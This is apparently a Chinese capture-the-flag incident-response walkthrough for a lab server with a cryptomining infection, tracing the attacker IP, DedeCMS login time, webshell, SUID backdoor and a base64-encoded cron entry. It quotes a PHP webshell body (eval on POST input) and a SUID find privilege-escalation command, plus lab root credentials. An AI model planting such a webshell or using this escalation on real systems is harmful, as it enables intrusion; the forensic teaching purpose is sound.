玄机:第五章 linux实战-挖矿

简介

应急响应工程师在内网服务器发现有台主机 cpu 占用过高,猜测可能是中了挖矿病毒,请溯源分析,提交对应的报告给应急小组

复制代码
虚拟机账号:root
密码 :websecyjxy
web端口为:8081

1、黑客的IP是? flag格式:flag{黑客的ip地址},如:flag{127.0.0.1}

发现日志里有一个文件大小异常

复制代码
cd /www/admin/websec_80/log/
cut -d- -f 1 nginx_access_2023-12-22.log|uniq -c | sort -rn | head -20

发现了可疑 IP

复制代码
flag{192.168.10.135}

2、黑客攻陷网站的具体时间是? flag格式:flag{年-月-日 时:分:秒},如:flag{2023-12-24 22:23:24}

访问靶场网站

复制代码
52.83.102.186:8081/dede

是 dedecms, 使用弱口令登录

复制代码
账号:admin
密码:12345678

发现有两个账户,根据刚刚获取到的黑客ip,可以发现该时间

复制代码
flag{2023-12-22 19:08:34}

3、黑客上传webshell的名称及密码是? flag格式:flag{黑客上传的webshell名称-webshell密码},如:flag{webshell.php-pass}

将文件下载下来,使用 D盾进行扫描检测,发现了一个后门

找到该目录查看文件内容

解密之后是:eval($_POST['cmd']);

复制代码
flag{404.php-cmd}

4、黑客提权后设置的后门文件名称是? flag格式:flag{后门文件绝对路径加上名称},如:flag{/etc/passwd}

查看历史命令记录,发现 find 被赋予了suid权限,黑客可以使用suid提权做后门,

黑客执行以下命令即可从服务权限提升到root权限,即find文件被做了后门,( 黑客利用 find 命令被赋予了SUID权限后所进行的攻击)

find / -exec 任意命令 {} \;

复制代码
flag{/usr/bin/find}

5、对黑客上传的挖矿病毒进行分析,获取隐藏的Flag

找挖矿程序就要找计划任务但是crontab指令用不了

审查该文件/etc/crontab,在691行的一段python代码比较可疑,进行base64解码

复制代码
691 nohup python2 -c "import base64;exec(base64.b64decode('aW1wb3J0IHRpbWUKd2hpbGUgMToKICAgIHByaW50KCJmbGFne3dlYnNlY19Uc nVlQDg4OCF9IikKICAgIHRpbWUuc2xlZXAoMTAwMCk='))" >/dev/null 2>&1

获得最终的flag

复制代码
flag{websec_True@888!}

flag

复制代码
flag{192.168.10.135}
flag{2023-12-22 19:08:34}
flag{404.php-cmd}
flag{/usr/bin/find}
flag{websec_True@888!}
相关推荐
君鼎10 分钟前
安全逆向工程学习路线
安全·逆向·网安
写bug的羊羊1 小时前
CentOS 9 配置国内 YUM 源
linux·运维·centos
清 晨2 小时前
剖析 Web3 与传统网络模型的安全框架
网络·安全·web3·facebook·tiktok·instagram·clonbrowser
国科安芯2 小时前
抗辐照芯片在低轨卫星星座CAN总线通讯及供电系统的应用探讨
运维·网络·人工智能·单片机·自动化
gx23483 小时前
HCLP--MGER综合实验
运维·服务器·网络
VB5943 小时前
[N1盒子] 斐讯盒子N1 T1通用刷机包(可救砖)
网络
angushine3 小时前
鲲鹏服务器部署Kafka2.8.1
运维·服务器
-XWB-3 小时前
【安全漏洞】防范未然:如何有效关闭不必要的HTTP请求方法,保护你的Web应用
服务器·网络·http
编程到天明3 小时前
CTF-Web题解:“require_once(‘flag.php‘); &assert(“$i == $u“);”
网络安全·php
Johny_Zhao3 小时前
CentOS Stream 9上部署FTP应用服务的两种方法(传统安装和docker-compose)
linux·网络安全·信息安全·kubernetes·云计算·containerd·ftp·yum源·系统运维